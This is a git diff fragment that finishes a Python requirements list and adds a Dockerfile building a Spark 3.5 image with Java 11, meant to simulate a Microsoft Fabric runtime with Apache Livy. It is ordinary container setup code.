+pandas +requests +msal +python-dotenv \ No newline at end of file diff --git a/apache/livy/ExposedUI/spark/Dockerfile b/apache/livy/ExposedUI/spark/Dockerfile new file mode 100644 index 00000000..803d3f1c --- /dev/null +++ b/apache/livy/ExposedUI/spark/Dockerfile @@ -0,0 +1,23 @@ +# https://github.com/apache/spark-docker/tree/master +# https://hub.docker.com/_/spark/tags +# Simulating Microsoft Fabric Runtime 1.3(with Apache Livy), Spark 3.5, Java 11 +FROM spark:3.5.4-python3 +USER root +RUN apt-get update && apt-get install -y curl + +# Install Python Dependencies +COPY ./requirements.txt /opt/ +RUN pip install -r /opt/requirements.txt + +# Apache Livy exception using Java 17 +# Exception in thread "main" java.util.concurrent.ExecutionException: javax.security.sasl.SaslException: Client closed before SASL negotiation finished. + +# Using Java 11 +# https://jdk.java.net/archive/ +WORKDIR /opt/java/ +RUN curl "https://download.java.net/java/GA/jdk11/9/GPL/openjdk-11.0.2_linux-x64_bin.tar.gz" -o openjdk-update.tar.gz \ + && tar -xzf "openjdk-update.tar.gz" \ + && rm -rf openjdk openjdk-update.tar.gz \ + && mv jdk-* openjdk + +USER spark